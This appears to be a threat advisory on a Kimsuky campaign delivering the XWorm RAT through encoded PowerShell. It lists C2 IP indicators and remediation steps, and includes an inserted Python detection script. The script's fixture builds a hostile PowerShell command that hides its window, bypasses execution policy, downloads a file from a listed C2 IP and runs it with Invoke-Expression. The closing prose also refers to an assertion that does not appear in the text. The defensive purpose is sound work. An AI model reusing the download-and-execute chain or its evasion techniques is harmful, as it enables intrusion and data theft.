May 22, 2025
Severity
High
Analysis Summary
Cybersecurity researchers have uncovered a highly sophisticated malware campaign by the Kimsuky Advanced Persistent Threat (APT) group, utilizing intricately crafted PowerShell payloads to deploy the XWorm Remote Access Trojan (RAT). This campaign demonstrates Kimsuky's advanced capabilities through the use of encoded scripts and multi-stage attack chains designed to infiltrate systems, evade security defenses, and maintain covert remote access. The operation primarily focuses on data exfiltration and establishing persistent access, leveraging techniques like fileless execution and Living-off-the-Land Binaries and Scripts (LOLBAS) to remain undetected.
The attack begins with Base64-encoded PowerShell scripts which, once decoded, initiate a series of malicious actions. These scripts download RAR archives, binaries such as orwartde.exe, and additional PowerShell scripts disguised as harmless text files from known malicious IP addresses, notably 185.235.128.114 and 92.119.114.128. The same IPs serve as active command-and-control (C2) endpoints, enabling further payload downloads and data exfiltration. A notable technique is the embedding of inline C# code within PowerShell to invoke the Win32 API ShowWindow, which hides the console window and keeps the malicious activity out of the victim's sight.
To enhance deception, the attackers download decoy PDF files that distract victims while other malware components, including eworvolt.exe and enwtsv.exe, execute in the background. These payloads may run multiple times to ensure successful deployment across the different stages. PowerShell's ExecutionPolicy Bypass option is used to run scripts regardless of the configured policy, and Windows Event Logging is disabled for defense evasion. The campaign further employs password-protected archives and delayed execution to synchronize its multi-step process. Hidden malicious content within files such as ov_er15z.txt is executed via Invoke-Expression, marking the stage where the core payload, ranging from remote access to keylogging, is activated. Kimsuky's use of obfuscation, encoded C2 traffic, and native system tools underscores their evolving sophistication in targeting high-value networks.
Impact
- Unauthorized Remote Access
- Data Exfiltration
- Credential Theft
Indicators of Compromise
IP
185.235.128.114
92.119.114.128
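The layered encoding described in the Analysis Summary means the C2 addresses listed above never appear on the raw process command line: a defender first has to unwrap the -EncodedCommand argument (UTF-16LE, then Base64) and any inline FromBase64String blobs before the IoCs and the Invoke-Expression stage become visible. The following Python triage script is an added example, not part of this advisory or any vendor tooling. It builds a constructed command line modelled on the described chain (ShowWindow P/Invoke via Add-Type, ExecutionPolicy Bypass, a nested Base64 layer, a download from one of the listed IPs, Invoke-Expression on ov_er15z.txt), unwraps every layer, and scores the behavioural indicators. The indicator names, weights, verdict thresholds and fixture scripts are this example's own assumptions.

```python
import base64
import re
from typing import List, Optional

# Indicator IPs published in the advisory above.
KNOWN_C2_IPS = {"185.235.128.114", "92.119.114.128"}

# Behavioural indicators drawn from the advisory's description of the chain.
# Names and weights are this example's own choices, not a vendor rule set.
INDICATORS = [
    ("invoke_expression",      1, re.compile(r"\b(?:Invoke-Expression|iex)\b", re.I)),
    ("executionpolicy_bypass", 1, re.compile(r"-(?:ExecutionPolicy|ep)\s+Bypass", re.I)),
    ("hidden_window",          1, re.compile(r"-(?:WindowStyle|w)\s+Hidden", re.I)),
    ("showwindow_pinvoke",     2, re.compile(r'DllImport\s*\(\s*"user32(?:\.dll)?"[^;]*ShowWindow', re.I | re.S)),
    ("event_log_tamper",       2, re.compile(r"wevtutil\s+(?:cl|sl)\b|Clear-EventLog|Limit-EventLog", re.I)),
    ("download_cradle",        1, re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)),
    ("nested_base64",          1, re.compile(r"FromBase64String", re.I)),
]

_ENCODED_ARG = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
_INLINE_B64 = re.compile(r"""FromBase64String\(\s*['"]([A-Za-z0-9+/=]{16,})['"]\s*\)""", re.I)
_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def encode_command(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _decode_b64(blob: str) -> Optional[str]:
    """Decode a Base64 blob, preferring whichever of UTF-16LE / UTF-8 yields readable ASCII text."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return None
    best = None
    for enc in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        # Fraction of printable ASCII: UTF-16LE bytes read as UTF-8 are full of NULs and score low.
        ascii_ratio = sum(c.isascii() and (c.isprintable() or c in "\r\n\t") for c in text) / max(len(text), 1)
        if best is None or ascii_ratio > best[0]:
            best = (ascii_ratio, text)
    return best[1] if best and best[0] > 0.9 else None


def unwrap_layers(cmdline: str, max_depth: int = 5) -> List[str]:
    """Return [cmdline, layer 1, layer 2, ...], following -EncodedCommand and inline FromBase64String blobs."""
    layers, frontier = [cmdline], [cmdline]
    for _ in range(max_depth):
        nxt = []
        for text in frontier:
            blobs = [m.group(1) for m in _ENCODED_ARG.finditer(text)]
            blobs += [m.group(1) for m in _INLINE_B64.finditer(text)]
            for blob in blobs:
                decoded = _decode_b64(blob)
                if decoded and decoded not in layers:
                    layers.append(decoded)
                    nxt.append(decoded)
        if not nxt:
            break
        frontier = nxt
    return layers


def triage(cmdline: str) -> dict:
    """Unwrap all encoding layers, then match indicators and the advisory's C2 IPs across every layer."""
    layers = unwrap_layers(cmdline)
    corpus = "\n".join(layers)
    hits = [name for name, _, rx in INDICATORS if rx.search(corpus)]
    score = sum(w for name, w, _ in INDICATORS if name in hits)
    if len(layers) > 1:  # an encoded payload is itself worth noting
        hits.append("encoded_payload")
        score += 1
    c2 = sorted(set(_IPV4.findall(corpus)) & KNOWN_C2_IPS)
    score += 3 * len(c2)
    verdict = "malicious" if c2 or score >= 4 else "suspicious" if score >= 1 else "benign"
    return {"layers": len(layers), "indicators": hits, "c2_ips": c2, "score": score, "verdict": verdict}


# --- Constructed fixtures (this example's own, modelled on the advisory's description) ---
_INNER = encode_command(
    "(New-Object Net.WebClient).DownloadFile('http://185.235.128.114/ov_er15z.txt', \"$env:TEMP\\ov_er15z.txt\");"
    "Invoke-Expression (Get-Content \"$env:TEMP\\ov_er15z.txt\" -Raw)"
)
_OUTER = (
    "Add-Type -Namespace W -Name U -MemberDefinition '[DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr h, int n);';"
    "[W.U]::ShowWindow((Get-Process -Id $PID).MainWindowHandle, 0);"
    f"iex ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('{_INNER}')))"
)
SAMPLE_COMMAND_LINES = [
    f"powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand {encode_command(_OUTER)}",
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\Set-PrinterDefaults.ps1",  # admin-style, low score
    r"powershell.exe -NoProfile Get-ChildItem C:\Users",                                   # benign
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(triage(line))
```

Run as-is, the script prints one verdict per constructed command line; in practice the input would be the command-line field of Sysmon Event ID 1 or Security Event ID 4688 records. Where PowerShell script block logging (Event ID 4104) is enabled, as the Remediation section recommends, the decoded script is logged directly and the unwrapping step is only needed for hosts that have process-creation logging alone. The final assertion in the accompanying check makes the page's point explicit: the listed C2 IP is absent from the raw command line and surfaces only two layers down.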
Remediation
- Regularly apply security patches, especially for Windows and PowerShell-related vulnerabilities.
- Restrict PowerShell usage to authorized users and implement logging for script execution.
- Monitor network traffic for unusual outbound connections, especially to known malicious IPs.
- Disable or restrict LOLBAS execution through Group Policy or application control.
- Use strong endpoint detection and response (EDR) tools to detect fileless malware activity.
- Enable Windows Event Logging and monitor for suspicious behavior or tampering.
- Block known malicious IPs (e.g., 185.235.128.114, 92.119.114.128) at the firewall level.
- Enforce least-privilege access and remove unnecessary administrative rights.
- Deploy email and web filtering to prevent phishing and initial payload delivery.
- Conduct regular security awareness training to help users recognize suspicious files or links.